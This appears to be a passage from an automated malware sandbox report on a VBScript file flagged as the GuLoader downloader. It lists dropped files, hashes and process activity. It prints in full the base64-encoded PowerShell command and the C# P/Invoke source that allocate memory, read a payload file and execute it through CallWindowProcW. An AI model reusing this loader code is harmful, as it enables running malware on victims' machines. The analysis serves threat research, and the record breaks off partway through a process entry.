                SSDEEP:768:L3QU7awMz32kQXkifR/FQc1aOCLDh9/zkW8jjPtC0qPEoB1:LH83XifVWc1aFrAWWznx21
                MD5:2A22122630F746A9315DE8C7FB00EB92
                SHA1:B6DDB9ABE5B0DF63FE74E226F398C0A9EC1A73AE
                SHA-256:994CD060E9D46E82EB631262C8867E403C863AD3B008BEAE9D3C636DE172A053
                SHA-512:6F583D3D898BD31103DE0A567EA3735401F8530E15B2960D0F88F86625FA8AF172EBA9496D6353EEBBA794B3D50D1042D9E4FD375FD630023B90EA7EF4F7DA04
                Malicious:false
                Reputation:low
                Preview:.o.....@..\................................................................r...]g.5w/////////////////////////////////////////////////////////////////////////////////////////......f.s....C.6O"...............................................................h.d......`.w.4||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||.4$m/[d....Gd.><....................................................................,$/.>......B...S..............................................................Zf.q.....N.=2`...................................................................................S}a.p.....................................................................................EO7..................................................................._....o..K?..G.......................................................................1......>.@Qn9999999999999999999999999999999999999999999999999999999999.e.f.s..O..nZPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4r5keq5b.ibr.psm1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zswekgav.qwg.ps1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.0901327563417746
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEHak7Ynqq/QPN5Dlq5J:+RI+ycuZhNuHakS/QPNnqX
                MD5:AAF9D1A227CBB70DF106E14EEE93D023
                SHA1:16F2F5143E08845C709A498AABC9C03BA8818477
                SHA-256:9D3004CB5E77089E2175604201DA681D020E4385DA1A5310B980A6B33455BC55
                SHA-512:8CF0759F7EE93A45B602D2DC59A50E4CDCD389D90E62871B887DB01722DCFF65C4DAAF95DB6C1D1F90745E792E7B6ECCECC72BBD806F01D477EB7E094A599AC4
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.i.d.m.j.1.a.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.i.d.m.j.1.a.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.0.cs

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):725
                Entropy (8bit):5.0360659051782966
                Encrypted:false
                SSDEEP:12:V/DGrcXvLZCGNVulF4fVtKMLr3F8aKGWJVIyLq+OwQiP2IE0wn:JocXvLZCGLuwNpr3F8rGiWP+QL
                MD5:9B3EA1C2DE62E6D7ED2BFCC1920981F2
                SHA1:74BCDC2E2BBFFBE1482E6F04EC22F99397CE6823
                SHA-256:8D956F943B2F42AD00C23891D7B9A19A423140B88962345019B920EF1C3BC690
                SHA-512:805C137EF0A218A5400B8D005603A80E5B9F8965CA2C7F618AC65923BB08812F1D922DCE4CACD3E882E8F72947D5C2B661AB1F644A4512CCDEB02AD04AB09D02
                Malicious:false
                Preview:.using System;..using System.Runtime.InteropServices;..public static class Sludrech1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);..[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);..}

                C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.2038505371770345
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fX0zxs7+AEszIwkn23fhn:p37Lvkmb6KRf/0WZEif5
                MD5:13C5ECEB34F1162659388A026B5954AB
                SHA1:CCCF23AF00B608EFCE3ECDCA53FB64190A5D5C3C
                SHA-256:A24EECC37DC4C8A09BA7DE54836FC8E0D4F3D6621CFC03A43616066EF2DF2660
                SHA-512:2D7EF632251B60970A862737DEA98831FA04DB3EA8F42F08D3CE7F0515D8A41659A152F4EBE63069F3B0DA40CD2294A3047300562894209AFC884F6574DBD487
                Malicious:false
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.0.cs"

                C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dll

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):3.141216582894879
                Encrypted:false
                SSDEEP:24:etGSxtoDTc8cTyqvCxCIhw0r2ZIpHUXStkFk9JboWI+ycuZhNuHakS/QPNnq:6QPvcTja8IhHNQFk9JbD1ul8a3Aq
                MD5:BF5173E64D389BA33EB61E55BD540B26
                SHA1:B9994722FF68B36F1EE57725519C0A67FEDECC47
                SHA-256:36C97105DB819B02B4200DEE2FBBEB5818C51825AB7AF42E22F686115AC1402D
                SHA-512:9F727F4C557B6EA2F5A2609F2D602A5AAEF7945CD2C614B32868594C2B4648D9487B0E18A6C96D7C5AF0A37B88E3686D6F406AAF2987872027755F0706580A6C
                Malicious:false
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................1.*...{.[.....[.......................................... 8............ P............ \.!.......... e.+.......u.............................................................................................................

                C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.out

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                Category:modified
                Size (bytes):867
                Entropy (8bit):5.3085948882487175
                Encrypted:false
                SSDEEP:24:KJBqd3ka6KRf/VEif8KaM5DqBVKVrdFAMBJTH:Cika6C/VEu8KxDcVKdBJj
                MD5:1B0F69F4D7FD225D9C87C165866DE451
                SHA1:F62390DBB4346456CF96500794AF7BC2DAAAF268
                SHA-256:F28D13187C40979DF4795998DBDCC08C5C4E807725EE4840DD0CAB8DB5D08D4F
                SHA-512:9C07D46E45C7EAE44FAE5939A7C7244137DBF9597086B6BB91F94D5BE39FDD2E3B73F79876ED722F210978FE1A1F9DBC54134CB54D9C10C41D40FFCE99D20EC2
                Malicious:false
                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                C:\Users\user\Documents\20220128\PowerShell_transcript.715575.6U9qttPO.20220128145102.txt

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):10897
                Entropy (8bit):5.12693841528302
                Encrypted:false
                SSDEEP:192:dpW1kgUKMdFduG9JfKj2bpFpgBA8dPANoJThV8X1XxtYwYs6qfBCRY0y92:dY1UK0zuWfKqbpFpgy8dPANoJThyX1AJ
                MD5:F837CD661E667C3EDE2ABF38FAA3B704
                SHA1:32FF94D3217EDDEB58E01DFF6F216E6884D5529E
                SHA-256:F5550BB25EF1B9E39D91784A026455DB44628953DBD6096B2756058D1758E845
                SHA-512:3DEABE504BA3B5D7774D8C5E9238EE9F224758BCB27CBEC23E56A5F6D314B5DE53C387D0B34A6B1F55C5782F1CA4DBC6189435F64870273372DD45C52BF27C67
                Malicious:false
                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220128145133..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIAD

                Static File Info

                General

                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):4.634802658157138
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:IMG 0045434.vbs
                File size:151564
                MD5:813117cdcd80979365fd6d9586d11e4a
                SHA1:e28ef2705053405e87f440f078f31d13b09a9ee3
                SHA256:1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa
                SHA512:937b8defc5c8fa7661ea2431f768d38276f7ca44bbd3c729a755c3f84806dbbb8905b3187ebc419995fdfa9fa1f9699b8dbda037b4eff817a91e6744f019885c
                SSDEEP:3072:ycs/Z4IREvusFyK3tzh6QM+dNIeWwXXX3QsiXXXXXXXXXXXXXXXXXXXvXXXXXX/J:yzCusn97KR7
                File Content Preview:'Term Glossarian Hauber indta colorado Torsimeter Uniso Streeter1 Count9 SAMURAIEN STVEKLUD Hyrernemet5 Produ1 Enrobed2 Troljer8 ..'Unobesene2 GLANDI OPFAND Skaldyrs Pretr1 HAMR TETRAMA Lett Tirle Inoc Stagsupe2 ADRESSERIN dephlegm evenly LOVLIGHEDF Barto

                File Icon

                Icon Hash:e8d69ece869a9ec4

                Network Behavior

                No network behavior found

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:1
                Start time:14:50:19
                Start date:28/01/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
                Imagebase:0x7ff7ba5d0000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:3
                Start time:14:50:56
                Start date:28/01/2022
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcABpAGwAdABzAHQAIABPAG0AcwBvAHIAZwBzAGMAZQAgAFAAcgBlAGwANgAgAGIAYQByAHMAawBhAGIAZQBzAG4AIABNAGUAdABhAHQAaABlACAAVABlAGwAZQB2AHMAbgBlAHQAcwA2ACAAUwBtAGEAbABzADcAIABCAE8ATwBTAFQARQBSAEkAIABtAGkAcwBtACAAUABJAE4AUwAgAFQAbgBkAGUAaAB2AGwAMQAgAHMAawByAGkAdgAgAE8AdgBlAHIAIAB1AG4AcAByAG8AcABhAGcAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgAaQBsAGQAMwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAGkAZQByAGkAZAAiACAADQAKACQAUwBsAHUAZAByAGUAYwBoADMAPQAwADsADQAKACQAUwBsAHUAZAByAGUAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAUwBsAHUAZAByAGUAYwBoADgAPQBbAFMAbAB1AGQAcgBlAGMAaAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAbAB1AGQAcgBlAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAFMAbAB1AGQAcgBlAGMAaAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAcwBvAGcAbgBlACAAcwBhAG4AZwAgAE4AWQBUAFYAQQBOAEMAIABSAGkAbABsAGUAdABwAHIAbwA4ACAAcABvAHAAdQBsAGEAcgAgAGIAaQBsAGwAZQBkAG0AIABsAHMAZQBwAHIAbwBjACAAYwBvAG4AcwB0AGEAbgAgAFMAdQBiAHQAZQAgAEkAbABzAGEAYgBlAHQAOQAgAGgAdQBsAGsAeQBuAGEAcAAgAGIAZQB2AHIAdABlAHIAZQBuACAAUwBpAGQAZQB2AGkAIABNAGEAcwB0ACAARQBuAHMAbwBtADEAIABVAG4AZABlAHIAcwBjAGEAbABlADEAIABUAHIAeQBrAGsAZQByAGkAbAAgAEkAZABvAGwAaQBzAGUAcgBpADEAIAByAGUAZAB1ACAAdQBuAGQAdgBpAGcAZQBtAGEAbgAgAEQAZQBmAGUAIABLAE4ATwBDAEsATwBVACAAUwBsAHYAZQBzAHQAZQBzACAATgBvAG4AYgBlACAAUgBlAGEAcgBiAGkAdAByAGEAdAAgAGMAbwByAGIAZQBpAGwAcwBkAG8AIABzAGEAbgBkAHMAeQBuAGwAaQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAcwBlAGsAcgBlAHQAZQByACIAIAANAAoAJABTAGwAdQBkAHIAZQBjAGgAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwAVABSAEkAQwBBAC4AZABhAHQAIgANAAoAIwBlAGYAdABlAHIAIABEAHUAcABwAGUAdABmAG8AcgA1ACAAQwBhAHIAZgB1ADEAIABzAHUAcgBlAG4AZQAgAEEARgBTAEkARwAgAGEAcgBpAGsAYQByAGEAcABlAHIAIABQAEkARwBFAE8ATgBIAE8ATABFACAASABvAHYAZQBsAGUAIABTAG0AZQBsAHQAZQAgAG0AZQBsAGUAbgBhACAAVQB0AGEAawAzACAARwBMAE8AUgBJAEUATgBTACAAQwBvAG4AYwBpAG8ANQAgAA0ACgAkAFMAbAB1AGQAcgBlAGMAaAA0AD0AWwBTAGwAdQBkAHIAZQBjAGgAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAFMAbAB1AGQAcgBlAGMAaAAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAEIAdQBtAGIAZQByAHMAaABvAG8AIABVAG4AZgBsADMAIABVAG4AcwBhAGMAcgBhADUAIABPAHAAaAB0AGgAYQBsACAAQgByAGEAdAB0AGkAbgAyACAAUABZAFQASABPACAASABlAHIAbQBlAGQAcAA4ACAATAByAGUAcgAyACAAdgBhAHIAcAAgAFEAdQBhAGQAdwBvACAATwB2AGUAcgB0AGgAcgBvADIAIABBAHIAbQBlAG4AaQBhAGEAcgByADMAIABIAGEAbAB2ADQAIABDAHIAdQBuAGsAbABlAHAAZQBuADQAIAByAGUAcwBwAGkAcgAgAFMATQBVAEsASwBFAFMAVABJAFYAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEMAYQByAGMAaABhAHIAbwAiACAADQAKACQAUwBsAHUAZAByAGUAYwBoADUAPQAwADsADQAKACMAUABhAHIAcwA5ACAAUwBVAFAAUABPAFIAVABBACAARABKAEEARQBWAEUATABTAEsAQwAgAFAAUgBPAEMARQBSAEUATQBPACAATABvAHIAaQBjAGEAZQBwAHIAZQAgAGcAdQByAHIAcwAgAGQAZQBnAHIAYQAgAGwAaQB0AHUAcgBnAGkAZQBzACAAUABBAEEAVABBAEcARQAgAFUAbgByAGUAcAB1AGwAcwAgAFUAbgBhAGMAYwBlAHAAdABhACAASwBlAGwAbAA3ACAAVwBhAGcAZwBsAGUAcwB1AGQAZwAgAE0AZQBnAGEAbABvAHIAbgBpAHQAIABjAG8AbQBwAHUAIABCAFUARABTACAAQgByAG8AbwBkAHkAYQBzAHQAcgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwB2AGUAcgB0AHIAYQBtAHAAbAAiACAADQAKAFsAUwBsAHUAZAByAGUAYwBoADEAXQA6ADoAUgBlAGEAZABGAGkAbABlACgAJABTAGwAdQBkAHIAZQBjAGgANAAsACQAUwBsAHUAZAByAGUAYwBoADMALAA1ADQANwAzADEALABbAHIAZQBmAF0AJABTAGwAdQBkAHIAZQBjAGgANQAsADAAKQANAAoAIwBNAHUAcwBpAGMAcgB5AGIAdQAgAEQATwBLAFUATQAgAEIARQBTAEsAIABjAG8AYQBnAHUAbABvAG0AIABuAG8AbgBzAHkAcwB0AGUAIABQAFIARQBDAEUAUgBUAEkARgAgAFMAYQBiAGIAYQB0AGEAIABwAHUAbgBkAGsAdQByACAAQwBoAGwAbwAgAEwAbwBlAHMAZQAyACAASABhAHYAbgBlAGYAbwAzACAATQBlAHQAYQAxACAAaQBzAGIAYQBhAGQAcwBoAGEAIABUAHIAYQBjAGgAeQBjAGEAIABIAEUAUgBSAEUARwAgAEwAQQBOAEQAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFoAZQBhAGwAOQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGEAbABrAHYAcgBrADQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAbABlAHYAZQBmAG8AZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHQAcgBiAGUANAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAEkATgBFAE4ARABFAFMASwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHAAZQBhAGsAZQBhAHMAeQBjADgAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATQBVAFMASwBVACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAcgBhAG4AZABzAGwAdQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBBAGQAZABpAGIAbABlAGQAZQBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAaABvAGIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATgBpAGcAaAB0AHcAMwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAGoAZQBuAGUAcwB0AGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASABpAGcAaAB3AGEAeQBtAGEAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwBwAGQAYQB0AGUAcgBpACIAIAANAAoAWwBTAGwAdQBkAHIAZQBjAGgAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAVwAoACQAUwBsAHUAZAByAGUAYwBoADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA==
                Imagebase:0x120000
                File size:430592 bytes
                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high

                General

                Target ID:4
                Start time:14:50:57
                Start date:28/01/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff724c50000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:12
                Start time:14:52:01
                Start date:28/01/2022
